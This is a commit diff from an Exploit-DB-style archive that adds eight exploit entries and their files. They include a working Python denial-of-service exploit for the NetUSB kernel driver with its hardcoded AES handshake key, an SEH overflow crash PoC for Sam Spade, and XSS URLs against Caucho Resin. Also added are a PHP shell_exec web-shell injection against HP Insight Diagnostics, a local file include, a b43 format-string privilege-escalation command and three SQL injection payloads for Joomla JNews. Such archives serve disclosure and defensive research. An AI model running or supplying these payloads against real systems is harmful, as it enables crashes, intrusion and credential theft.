DB: 2015-10-30

8 new exploits

files.csv

@@ -34831,3 +34831,11 @@ id,file,description,date,author,platform,type,port
 38556,platforms/android/dos/38556.txt,"Samsung seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0
 38557,platforms/android/dos/38557.txt,"Samsung fimg2d FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0
 38558,platforms/android/dos/38558.txt,"Samsung SecEmailComposer QUICK_REPLY_BACKGROUND Permissions Weakness",2015-10-28,"Google Security Research",android,dos,0
+38559,platforms/linux/local/38559.txt,"Linux Kernel <= 3.3.5 'b43' Wireless Driver Local Privilege Escalation Vulnerability",2013-06-07,"Kees Cook",linux,local,0
+38560,platforms/php/webapps/38560.txt,"Caucho Resin /resin-admin/ URI XSS",2013-06-07,"Gjoko Krstic",php,webapps,0
+38561,platforms/php/webapps/38561.txt,"Caucho Resin index.php logout Parameter XSS",2013-06-07,"Gjoko Krstic",php,webapps,0
+38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics Remote Code Injection Vulnerability",2013-06-10,"Markus Wulftange",php,webapps,0
+38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics Local File Include Vulnerability",2013-06-10,"Markus Wulftange",php,webapps,0
+38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC",2015-10-29,"Luis Martínez",windows,dos,0
+38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80
+38566,platforms/hardware/dos/38566.py,"NetUSB Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0

platforms/hardware/dos/38566.py

@@ -0,0 +1,110 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# Exploit Title: NetUSB Kernel Stack Buffer Overflow
+# Date: 9/10/15
+# Exploit Author: Adrian Ruiz Bermudo
+# Vendor Homepage: http://www.kcodes.com/
+# Version: Multiple: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt
+# Tested on: NETGEAR DC112A
+# CVE : CVE-2015-3036
+
+import socket
+import sys
+import random
+import string
+import time
+import struct
+from Crypto.Cipher import AES #pip install pycrypto
+
+DOS_BYTES = 128	#BoF
+TIMEOUT = 5
+RECV_SIZE = 16
+PORT_DEFAULT = 20005
+
+AESKey = "\x5c\x13\x0b\x59\xd2\x62\x42\x64\x9e\xd4\x88\x38\x2d\x5e\xae\xcc"
+
+print "#"
+print "# Exploit KCodes NetUSB | Kernel Stack Buffer Overflow | Denial of Service (DoS)"
+print "# CVE-2015-3036"
+print "# Found by: Stefan Viehböck (Office Vienna) | SEC Consult Vulnerability Lab | https://www.sec-consult.com"
+print "# Exploit author: Adrián Ruiz Bermudo | @funsecurity | http://www.funsecurity.net"
+print "# Advisory: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt"
+print "#"
+print ""
+
+if len(sys.argv) >= 2:
+	try:
+		target = sys.argv[1]
+		try:
+			port = int(sys.argv[2])
+		except Exception as detail:
+			port = PORT_DEFAULT
+		
+		#Inicialización de la conexión.
+		init = "\x56\x05"
+		#Datos aleatorios para el handshake
+		randomData = "".join(random.choice(string.lowercase) for i in range(RECV_SIZE))
+		#Nombre del equipo con 128 carácteres para provocar DoS.
+		computerName = "".join(random.choice(string.lowercase) for i in range(DOS_BYTES))
+		#Longitud del nombre del equipo - "\x80\x00\x00\x00"
+		lengthComputerName = struct.pack("i", DOS_BYTES);
+		#Sync - "\x07\x00\x00\x00"
+		syncOK = struct.pack("i", 7);
+		#Finalización de la conexión.
+		end = "\x01"
+
+		encryption_suite = AES.new(AESKey, AES.MODE_ECB, "")
+		randomDataCrypt1 = encryption_suite.encrypt(randomData)
+
+		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		sock.settimeout(TIMEOUT)
+
+		print "Conectando:", target,":",port
+		sock.connect((target, port))
+		print "Conectado"
+		print "----------------"
+
+		print "Inicializando:", init.encode("hex")
+		sock.send(init)
+		print "Random data para cifrar por el servidor:", randomData.encode("hex")
+		sock.send(randomData)
+		print "----------------"
+
+		result = sock.recv(RECV_SIZE)
+		print "Random data cifrados por el servidor:", result.encode("hex")
+		print "Random data cifrados por el cliente:", randomDataCrypt1.encode("hex")
+		if (randomDataCrypt1 == result):
+			print "Handshake OK"
+			randomData = sock.recv(RECV_SIZE)
+			print "Random data a cifrar por el cliente:", randomData.encode("hex")
+			randomDataCrypt2 = encryption_suite.encrypt(randomData)
+			print "Random data cifrados por el cliente:", randomDataCrypt2.encode("hex")
+			print "----------------"
+			sock.send(randomDataCrypt2)
+			print "Tamanio del nombre del host a parear:", lengthComputerName.encode("hex")
+			sock.send(lengthComputerName)
+			print "Nombre del host a parear:", computerName.encode("hex")
+			sock.send(computerName)
+			print "----------------"
+
+			print "Sync: ", syncOK.encode("hex")
+			sock.send(syncOK)
+			if (sock.recv(RECV_SIZE) == syncOK):
+				print "Sync ok"
+				sock.send(end)
+				try:
+					#Esperamos unos segundos antes de conectar
+					time.sleep(TIMEOUT)
+					#Comprobamos si el dispositivo sigue vivo...
+					sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+					sock.settimeout(TIMEOUT)
+					sock.connect((target, port))
+					print "No vulnerable"
+				except Exception as detail:
+					print "Vulnerable, exploit OK"
+			else:
+				print 'Sync error.'
+	except Exception as detail:
+		print "Error de comunicación:", detail
+else:
+	print "Usage:", sys.argv[0], "target [port]"

platforms/linux/local/38559.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60410/info
+
+Linux kernel is prone to a local privilege-escalation vulnerability.
+
+Local attackers can exploit the issue to execute arbitrary code with kernel privileges or to crash the kernel, effectively denying service to legitimate users. 
+
+# rmmod b43
+# modprobe b43 fwpostfix=AA%xBB
+# dmesg 

platforms/php/webapps/38560.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60426/info
+
+Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Resin Professional 4.0.36 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 

platforms/php/webapps/38561.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60426/info
+ 
+Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+Resin Professional 4.0.36 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 

platforms/php/webapps/38562.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60447/info
+
+HP Insight Diagnostics is prone to a remote code-injection vulnerability.
+
+An attacker can exploit this vulnerability to inject and execute arbitrary code within the context of the affected application.
+
+HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected.
+
+https://www.example.com/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes 

platforms/php/webapps/38563.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60449/info
+
+HP Insight Diagnostics is prone to a local file include vulnerability because it fails to adequately validate user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html 

platforms/php/webapps/38565.txt

@@ -0,0 +1,72 @@
+# Description of the component:
+Reach, engage and delight more customers with newsletters, auto-responders
+or campaign management.
+
+##################################################################################################
+# Exploit Title: [Joomla component com_jnews - SQL injection]
+# Google Dork: [inurl:option=com_jnews]
+# Date: [2015-10-29]
+# Exploit Author: [Omer Ramić]
+# Twitter: https://twitter.com/sp_omer
+# Vendor Homepage: [http://www.joobi.co/]
+# Software Link: [
+http://www.joobi.co/index.php?option=com_content&view=article&id=8652&Itemid=3031
+]
+# Version: [8.5.1] & probably all prior
+# Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
+##################################################################################################
+
+#Vulnerable POST parameter:
+Parameter_1: sub_list_id[1] (This parametar needs to be encoded when
+exploited as: sub_list_id%5B1%5D)
+
+
+#The vulnerable parameter is within the following request:
+
+POST /joomlatest/index.php?option=com_jnews HTTP/1.1
+Host: 192.168.0.10
+User-Agent: Hidden-user-agent-version
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://192.168.0.10/joomlatest/index.php?option=com_jnews&view=subscribe&act=subone&Itemid=206
+Cookie:
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 318
+
+Itemid=188&name=asdf&email=asdf%40asdf.com
+&receive_html=0&timezone=00%3A00%3A00&confirmed=1&subscribed%5B1%5D=0&sub_list_id%5B1%5D=1&acc_level%5B1%5D=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
+
+
+
+
+
+#Vector:
+sub_list_id%5B1%5D=1[SQLi]
+
+
+
+POC_1: boolean-based blind
+Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
+RLIKE (SELECT (CASE WHEN (7097=7097) THEN 1 ELSE 0x28
+END))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
+
+POC_2: error-based
+Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
+AND EXTRACTVALUE(8483,CONCAT(0x5c,0x716b787671,(SELECT
+(ELT(8483=8483,1))),0x716b786b71))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
+
+POC_3: AND/OR time-based blind
+Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=(SELECT
+* FROM
+(SELECT(SLEEP(5)))Qrax)&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1
+
+
+
+###################################
+# Greets to Palestine from Bosnia          #
+###################################
+
+Good Luck ^__^

platforms/windows/dos/38564.py

@@ -0,0 +1,46 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# Exploit Title		: Sam Spade 1.14 Scan from IP address Field SEH Overflow Crash PoC
+# Discovery by		: Luis Martínez
+# Email			: l4m5@hotmail.com
+# Discovery Date	: 20/10/2015
+# Vendor Homepage	: http://samspade.org
+# Software Link		: http://www.majorgeeks.com/files/details/sam_spade.html
+# Tested Version	: 1.14
+# Vulnerability Type	: Denial of Service (DoS) Local
+# Tested on OS		: Windows XP Professional SP3 x86 es
+# Crash Point		: Go to Tools > Scan addresses field > Enter the contents of 'samspade_1.14_BoF.txt' > OK
+##########################################################################################
+#  -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+# After the execution of POC, the SEH chain looks like this: 
+# 0012EBE0 43434343
+# 42424242 *** CORRUPT ENTRY ***
+ 
+# And the Stack
+ 
+#0012EBD0   41414141  AAAA
+#0012EBD4   41414141  AAAA
+#0012EBD8   41414141  AAAA
+#0012EBDC   41414141  AAAA
+#0012EBE0   42424242  BBBB  Pointer to next SEH record
+#0012EBE4   43434343  CCCC  SE handler
+ 
+# And the Registers
+ 
+#EAX 00000001
+#ECX 00000001
+#EDX 00140608
+#EBX 00000000
+#ESP 0012EBD0 ASCII "AAAAAAAAAAAAAAAABBBBCCCC - "
+#EBP 41414141
+#ESI 00C2BD00
+#EDI 00E89DB0
+#EIP 41414141
+
+buffer = "\x41" * 531
+nseh = "\x42" * 4
+seh = "\x43" * 4
+f = open ("samspade_1.14_BoF.txt", "w")
+f.write(buffer+nseh+seh)
+f.close()